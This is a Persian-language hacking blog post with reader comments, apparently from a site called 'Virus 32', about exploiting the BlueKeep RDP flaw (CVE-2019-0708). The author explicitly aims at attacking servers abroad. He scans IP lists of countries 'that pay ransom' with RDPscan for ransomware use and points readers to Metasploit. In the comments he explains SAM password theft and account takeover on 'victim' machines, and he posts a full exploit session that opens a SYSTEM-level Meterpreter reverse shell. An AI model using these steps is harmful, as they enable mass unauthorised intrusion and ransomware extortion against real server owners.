آسیب پذیری BlueKeep :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

شاید خیلی چیزا راجب آسیب پذیری BlueKeep شنیده باشید و تو سایت های مختلف مطالب زیادی راجبش خونده باشین

اما توی این پست قراره به مو شکافی این آسیب پذیری بپردازیم و به کمک این آسیب پذیری سرور مجازی کشور های مختلف رو مورد عنایت قرار بدیم :)

آسیب پذیری BlueKeep چیست ؟

آسیب پذیری بلوکیپ برای سال 2019 هستش که با مشخصه CVE-2019-0708 توی دنیای تست نفوذ شناخته میشه که به کمک اون میتونیم به ویندوز های XP - Win.7 - Win.Server2003 - Win.Server2008 نفوذ کنیم

این آسیب پذیری روی پروتکل RDP با پورت 3389 وجود داره

نحوه ی پیدا کردن یه سیستم آسیب پذیر چطوره ؟

اگه قصد و نیت ما فقط شناسایی یک سیستم باشه خیلی راحت میتونیم به کمک Nmap اون آسیب پذیری رو به کمک دستور پایین شناسایی کنیم

nmap -sV --script=rdp-vuln-ms12-020 -p 3389 127.0.0.1

البته ابزار Nmap بدلیل جامع و پرکاربرد بودنش سوئیچ های دیگه ای هم داره که کارایی RDPscan رو برامون داشته باشه که قراره توی این پست باهاش کار کنیم

ولی خب همونطور که گفتم ما میخوایم کارمون به کمک ابزار RDPscan باشه که میتونید توی گیت هاب پیداش کنید ( اینجا )

اگرم حسش نیست برای دانلود کلیک کنید :)

ولی از شوخی گذشته پیشنهاد میکنم حتما خودتون چک کنید ، چون اطلاعات مفیدی راجب این برنامه بهتون خواهد داد

حالا نیاز به یه لیست آی پی داریم که داخلش آی پی های اسکن شده پورت 3389 وجود داشته باشه که برای اینکار میتونیم از ابزار KportScanner کمک بگیریم

ولی یه راه حل ساده تر وجود داره

توی قسمت سرچ تلگرامتون ، جستجو کنید : آی پی اسکن شده و یکی از فایلای متنی مربوط به یکی از کشورارو که میدونین باج میدن برای برگردوندن فایلاشون انتخاب و دانلود کنید ( باج افزار ) D:

بعدش فایلای داخل RDPscan رو استخراج کنید و فایلی که داخلش آی پی اسکن شده وجود داشت رو کنار برنامه قرار بدین

حالا وارد خط فرمان یا همون CMD بشید و خودتونو به فولدر RDPscan دایورت کنید D:

راستی حواستون باشه که آدرس پورت 3389 به انتهای آدرس آی پی نچسبیده باشه ، چون اونا توسط برنامه اسکن نمیشن

به هر حال من اینجا میخوام آی پی های کشور آلمان رو اسکن کنم و اسم فایلم Germany هستش

در نتیجه دستور پایین رو توی خط فرمانم وارد میکنم و حداقل پنج دقیقه ای صبر به خرج میدم

البته پنج دیقه هم زیاده و سیستمای آسیب پذیر زیادی گیر میاد ، ولی خب برای کار باج افزار خوبه که صبوریت به خرج بدیم دیگه D:

RDPscan --file Germany.txt --workers 10000 > Results.TxT

نتیجه ی دستور بالا اینه که یه فایل متنی با اسم Results ایجاد میشه و نتیجه اسکنمون توی اون ذخیره خواهد شد

طبق تصویر پایین

بعد از چند دیقه کافیه که خط فرمان رو ببندیم

و وارد فایل Results میشیم که با تصویر پایین یا یکسری چیزای مشابه این تصویر رو به رو خواهید شد ، چون نتیجه اسکن برای هر بار عوض میشه

توی تصویر همونطور که مشخصه من چند تا آدرس آی پی رو رووشوون خط زرد رنگ کشیدم که اونا آی پی های آسیب پذیر هستن و شما برای بدست آوردن راحت اونا کافیه که کلید های ترکیبی Ctrl+F رو فشار بدین و تو کادر جستجور Vul رو وارد و جستجو کنید و بعد از مورد عنایت قرار دادن هر آی پی کلید F3 رو فشار بدین تا اون یکی آسیب پذیر رو براتون گیر بیاره

حالا نوبت به مرحله ی آخر یعنی اکسپلویت کردن این آسیب پذیری میرسه که این مرحله رو یه خرده سانسور شده توضیح میدم تا براتون جا بیفته و بقیشو از مطالب سایتای دیگه استفاده کنید

اینکار به کمک سیستم عامل کالی لینوکس و متاسپلویت صورت میگیره که اگرم بخوایم تو سیستم عامل های لینوکسی دیگه مثل اوبونتو انجام بدیم فقط کافیه که متاسپلویت رو روی اونا نصب کنیم ، یا از اسکریپت های پایتونی که توی گیت هاب برای اینکار وجود داره استفاده کنیم

اول از همه باید سیستم عامل رو بروزرسانی کنیم که برای اینکار از این دستور استفاده میکنیم

apt-get update && apt-get upgrade

در نهایت به کمک دستور reboot یکبار سیستم رو ReStart کنید و مجددا وارد حساب کاربری لینوکستون بشید

حالا وارد ترمینال بشید و با دستور msfconsole متاسپلویت رو استارت کنید و بقیشو هم به کمک آموزش هایی که داخل اینترنت منتشر شدن پیش برید

اگه هم موفق نشدید سعی کنید از اسکریپت های پایتونی استفاده کنید که مثلا نمونش اینجا قرار داره

موفق و پیروز باشید

نظر (۱۲)

سلام 

ببخشید وقتی که ما تمامی این مراحل رو طی کردیم چه اتفاقی برای اون آی پی میوفته؟

باتشکر

Virus32 ولم کنید (: :
دسترسی میگیریم به سیستم طرف...

سلام

عه مستر کدر برگشت D:

سلطان عالی بود، تو سایتا همش چرت و پرت نوشته بودن ماهم که انگلیسی....D:

دمت گرم، به افتخار داش کدر یه دست قشنگ...

Virus32 MR_C0D3R ‌ :
-_-
  • Virus32
  • DęЯǞqΦЦlǞ ..
  • بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است

    سلام چطوری *** بیا تل کارت دارم

    Virus32 MR_C0D3R ‌ :
    سلام
    ممنون ، تلگرامتو چک کن

    سلام اقا یه سوال پسورد سرور رو هم میشه پیدا کرد ؟

     

    ممنون میشم بگید اخه من تو کار کرک سرورم میخام این روشم امتحان کنم

    ممنون

    Virus32 MR_C0D3R ‌ :
    سلام
    توی ویندوز فایلی هست به اسم SAM
    به کمک این فایل میتونیم در صورت امکان به پسوورد ویندوز دسترسی پیدا کنیم
    ولی خب بستگی داره هدفت از اینکار چی باشه ؟!
    چون ما به راحتی میتونیم توی سیستم قربانی نام کاربری ایجاد کنیم یا حتی رمز عبورشو عوض کنیم ، و و و ....
  • Virus32
  • علیرضا آهنی
  • مطلب جامع و کاملی بود (;

    سلام بقیه شو بیاد چی کار کنیم مد نمیدونم موندم توش خواهشا یک چیز میزارین یکم راهنمایی کنید این دیگه فوق سانسور بود الان نفهمیدم باید set lhost= رو برابر با اون ای پی قربانی تنظیم کنیم پس پورت چند و بعد دستور run exploit کدوم ولی دمتون گرم که اینقدر مطلبو پیچوندید که ادم هایی که حرفه ایی هستن در این زمینه فقط متوجه میشن
    Virus32 ولم کنید (: :
    بستگی به پیلودت داره
    قطعا نمایم دو تا اموزش رو بزاریم توی یه پست (;

    سلام کدر

    چطوری؟
    [!] error on target: ip (ord() expected string of length 1, but int found), if this happened after a successful attack, change the wait time

    این ارور ماله همون اکسپلویتیه که گذاشتی
    داخل کدشو چک کردم اصن تایع ord به کار نبرده بود فقط دو جا استفاده کرده بود که اونم ورودیشو خودش میده

    Virus32 MR_C0D3R ‌ :
    سلام
    من تا الان به این خطا بر نخوردم
    تو گوگولی هم برات سرچش کردم چیز خاصی پیدا نشد
    یه سوال فنی ؟! من اکسپلویتی قرار ندادم ، منظورت کدوم اکسپلویت بود ؟ -_-

    سلام
    اکسپلویت پایتون رو ولش کن مهم نیست ببین من با متا اسپلویت زدم میگه اکسپلویت کامل شد ولی سشنی ایجاد نشد :/

    با rdpscan و خود متا اسپلویت ایپی رو چک کردم جفتشون میگن اسیب پذیره ولی خب جواب نداد :/

    این یکی فازش چیه؟ :/

    Virus32 MR_C0D3R ‌ :
    سلام
    این لینک و این لینک رو یه چک کن

    سلام کدر

    من باز اومدم
    یه نفره این پستتو داغ کردم D:

    ببین اون مشکل قبلی حل شد

    الان مشکلم یه چی دیگس

    به قول خودش میره تو فاز خطر :|

    بعد میگه Lobbing eggs ....

    بعد همونطوری میمونه :/

    منتظر هم میمونم ولی هیچی نمیشه

    Virus32 MR_C0D3R ‌ :
    سلام
    GroomSize رو تغییر بده ببین مشکلت حل میشه یا نه
    به عنوان مثال من GroomSize رو روی 150 قرار میدم و اکسپلویت درست کار نمیکنه
    مراحلشم به این شکل هستش :
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150
     GROOMSIZE => 150
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
    
     [*] Started reverse TCP handler on 192.168.43.84:4444 
     [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
     [+] 192.168.43.137:3389   - The target is vulnerable.
     [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1.
     [*] 192.168.43.137:3389 - Surfing channels ...
     [*] 192.168.43.137:3389 - Lobbing eggs ...
     [-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
     [*] Exploit completed, but no session was created.
    حالا وقتی که 50 رو تست کنم ، میبینم که مشکل حل میشه :
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50
     GROOMSIZE => 50
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
    
     [*] Started reverse TCP handler on 192.168.43.84:4444 
     [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
     [+] 192.168.43.137:3389   - The target is vulnerable.
     [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1.
     [*] 192.168.43.137:3389 - Surfing channels ...
     [*] 192.168.43.137:3389 - Lobbing eggs ...
     [*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
     [*] Sending stage (206403 bytes) to 192.168.43.137
     [*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530
    
    meterpreter > getuid
     Server username: NT AUTHORITY\SYSTEM
    گاهی اوقات هم میبینی مشکل از جاهای دیگست
    به عنوان مثال این آسیب پذیری سعی میکنه حافظه رو تخریب کنه
    و مجبور کنه که به ما مجوز دسترسی از راه دور بده ، بخاطر همین بعضی وقتا میبینی حافظه رو به خوبی اشغال نمیکنه و نمیتونیم دسترسی بگیریم

    کدر کامنت منو جواب بده دیگه :|

    Virus32 ولم کنید (: :
    میده صبر پیشه کن (:

    سلام 

    میشه اجرای ابزار rdpscane و کامل توضیح بدی من هر کاری کردم نتونستم احراش کنم 

    Virus32 MR_C0D3R ‌ :
    سلام
    توضیحاتش کامله
    توی کجای کار به مشکل میخورین ؟ اونجارو بگین تا بیشتر توضیح بدم

    تصویر هات کرونا گرفته :| D: دیده نمیشن

    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی